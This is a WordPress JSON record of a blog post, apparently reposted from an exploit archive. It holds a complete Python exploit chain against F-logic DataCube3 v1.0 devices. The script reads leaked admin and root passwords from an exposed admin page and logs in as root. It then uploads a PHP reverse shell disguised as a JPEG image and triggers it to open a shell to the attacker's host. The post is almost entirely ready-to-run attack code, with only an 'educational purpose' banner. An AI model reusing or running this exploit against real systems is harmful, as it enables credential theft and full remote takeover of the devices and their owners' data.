{"id":55292,"date":"2024-03-11T18:59:52","date_gmt":"2024-03-11T15:59:52","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177518\/datacube310-shell.txt"},"modified":"2024-03-12T11:00:37","modified_gmt":"2024-03-12T07:30:37","slug":"datacube3-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/datacube3-1-0-shell-upload\/","title":{"rendered":"DataCube3 1.0 Shell Upload"},"content":{"rendered":"

# Exploit Title: DataCube3 v1.0 – Unrestricted file upload ‘RCE’
\n# Date: 7\/28\/2022
\n# Exploit Author: Samy Younsi – NS Labs (https:\/\/neroteam.com)
\n# Vendor Homepage: https:\/\/www.f-logic.jp
\n# Software Link: https:\/\/www.f-logic.jp\/pdf\/support\/manual_product\/manual_product_datacube3_ver1.0_sc.pdf
\n# Version: Ver1.0
\n# Tested on: DataCube3 version 1.0 (Ubuntu)
\n# CVE : CVE-2024-25830 + CVE-2024-25832<\/p>\n

# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload<\/p>\n

from __future__ import print_function, unicode_literals
\nfrom bs4 import BeautifulSoup
\nimport argparse
\nimport requests
\nimport json
\nimport urllib3
\nimport re
\nurllib3.disable_warnings()<\/p>\n

def banner():
\ndataCube3Logo = “””
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588 DataCube3 Ver1.0 \u2588F-logic\u2593\u2593
\n\u2592\u2592\u2588\u2588\u2588\u2588\u2592\u2592\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593\u2593\u2593
\n\u2592\u2592\u2588\u2588\u2588\u2588\u2592\u2592\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588 \u2588\u2588\u2593\u2593\u2588\u2588\u2588\u2588\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2593\u2593\u2588\u2588\u2588\u2588\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593\u2593\u2593
\n\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2593\u2593\u2593\u2593\u2593<\/p>\n

\\033[1;92mSamy Younsi (Necrum Security Labs)\\033[1;m \\033[1;91mDataCube3 exploit chain reverse shell\\033[1;m
\nFOR EDUCATIONAL PURPOSE ONLY.
\n“””
\nreturn print(‘\\033[1;94m{}\\033[1;m’.format(dataCube3Logo))<\/p>\n

def extractRootPwd(RHOST, RPORT, protocol):
\nurl = ‘{}:\/\/{}:{}\/admin\/config_all.php’.format(protocol, RHOST, RPORT)
\ntry:
\nresponse = requests.get(url, allow_redirects=False, verify=False, timeout=20)
\nif response.status_code != 302:
\nprint(‘[!] \\033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\\033[1;m’)
\nexit()
\nsoup = BeautifulSoup(response.content.decode(‘utf-8’), ‘html.parser’)
\nscriptTag = str(soup.find_all(‘script’)[12]).replace(‘ ‘, ”)
\nrawLeakedData = re.findall(‘configData:.*,’, scriptTag)[0]\njsonLeakedData = json.loads(‘[{}]’.format(rawLeakedData.split(‘configData:[‘)[1].split(‘],’)[0]))
\nadminPassword = jsonLeakedData[12][‘value’]\nrootPassword = jsonLeakedData[14][‘value’]\nprint(‘[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\\n[INFO] The target must be vulnerable.’.format(adminPassword, rootPassword))
\nreturn rootPassword
\nexcept:
\nprint(‘[ERROR] Can\\’t grab the DataCube3 version…’)<\/p>\n

def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
\nprint(‘[INFO] Generating DataCube3 auth cookie …’)
\nurl = ‘{}:\/\/{}:{}\/admin\/config_all.php’.format(protocol, RHOST, RPORT)
\ndata = {
\n‘user_id’: ‘root’,
\n‘user_pw’: rootPassword,
\n‘login’: ‘%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3’
\n}
\ntry:
\nresponse = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
\nif response.status_code != 302:
\nprint(‘[!] \\033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\\033[1;m’)
\nexit()
\nauthCookie = response.cookies.get_dict()
\nprint(‘[INFO] Authentication successful! Auth Cookie: {}’.format(authCookie))
\nreturn authCookie
\nexcept:
\nprint(‘[ERROR] Can\\’t grab the auth cookie, is the root password correct?’)<\/p>\n

def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
\nprint(‘[INFO] Extracting Accesstime …’)
\nurl = ‘{}:\/\/{}:{}\/admin\/setting_photo.php’.format(protocol, RHOST, RPORT)
\ntry:
\nresponse = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
\nif response.status_code != 302:
\nprint(‘[!] \\033[1;91mError: An error occur while trying to get the accesstime value.\\033[1;m’)
\nexit()
\nsoup = BeautifulSoup(response.content.decode(‘utf-8’), ‘html.parser’)
\naccessTime = soup.find(‘input’, {‘name’: ‘accesstime’}).get(‘value’)
\nprint(‘[INFO] AccessTime value: {}’.format(accessTime))
\nreturn accessTime
\nexcept:
\nprint(‘[ERROR] Can\\’t grab the accesstime value, is the root password correct?’)<\/p>\n

def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
\nprint(‘[INFO] Injecting PHP reverse shell script …’)
\nfilename=’rvs.php’
\npayload = ‘<?php $sock=fsockopen(“{}”,{});$proc=proc_open(“sh”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>’.format(LHOST, LPORT)<\/p>\n

data = ‘—————————–113389720123090127612523184396\\r\\nContent-Disposition: form-data; name=”add”\\r\\n\\r\\n\u00e5\ufffd\ufffd\u00e7\ufffd\ufffd\u00e8\u00bf\u00bd\u00e5\ufffd\\xA0\\r\\n—————————–113389720123090127612523184396\\r\\nContent-Disposition: form-data; name=”addPhoto”; filename=”{}”\\r\\nContent-Type: image\/jpeg\\r\\n\\r\\n{}\\r\\n—————————–113389720123090127612523184396\\r\\nContent-Disposition: form-data; name=”accesstime”\\r\\n\\r\\n{}\\r\\n—————————–113389720123090127612523184396–\\r\\n’.format(filename, payload, accessTime)<\/p>\n

headers = {
\n‘Content-Type’: ‘multipart\/form-data; boundary=—————————113389720123090127612523184396’
\n}
\nurl = ‘{}:\/\/{}:{}\/admin\/setting_photo.php’.format(protocol, RHOST, RPORT)
\ntry:
\nresponse = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
\nif response.status_code != 302:
\nprint(‘[!] \\033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\\033[1;m’)
\nexit()
\nshellURL = ‘{}:\/\/{}:{}\/images\/slideshow\/{}’.format(protocol, RHOST, RPORT, filename)
\nprint(‘[INFO] PHP reverse shell script successfully uploaded!\\n[INFO] SHELL URL: {}’.format(shellURL))
\nreturn shellURL
\nexcept:
\nprint(‘[ERROR] Can\\’t upload the PHP reverse shell script, is the root password correct?’)<\/p>\n

def execReverseShell(shellURL):
\nprint(‘[INFO] Executing reverse shell…’)
\ntry:
\nresponse = requests.get(shellURL, allow_redirects=False, verify=False)
\nprint(‘[INFO] Reverse shell successfully executed.’)
\nreturn
\nexcept Exception as e:
\nprint(‘[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}’)
\nreturn False<\/p>\n

def main():
\nbanner()
\nargs = parser.parse_args()
\nprotocol = ‘https’ if args.RPORT == 443 else ‘http’
\nrootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
\nauthCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
\naccessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
\nshellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
\nexecReverseShell(shellURL)<\/p>\n

if __name__ == ‘__main__’:
\nparser = argparse.ArgumentParser(description=’Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.’, add_help=False)
\nparser.add_argument(‘–RHOST’, help=’Refers to the IP of the target machine. (f-logic DataCube3 device)’, type=str, required=True)
\nparser.add_argument(‘–RPORT’, help=’Refers to the open port of the target machine. (443 by default)’, type=int, required=True)
\nparser.add_argument(‘–LHOST’, help=’Refers to the IP of your machine.’, type=str, required=True)
\nparser.add_argument(‘–LPORT’, help=’Refers to the open port of your machine.’, type=int, required=True)
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: DataCube3 v1.0 – Unrestricted file upload ‘RCE’ # Date: 7\/28\/2022 # Exploit Author: Samy Younsi – NS Labs (https:\/\/neroteam.com) # Vendor Homepage: https:\/\/www.f-logic.jp # Software Link: https:\/\/www.f-logic.jp\/pdf\/support\/manual_product\/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55292","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55292"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55292\/revisions"}],"predecessor-version":[{"id":55301,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55292\/revisions\/55301"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}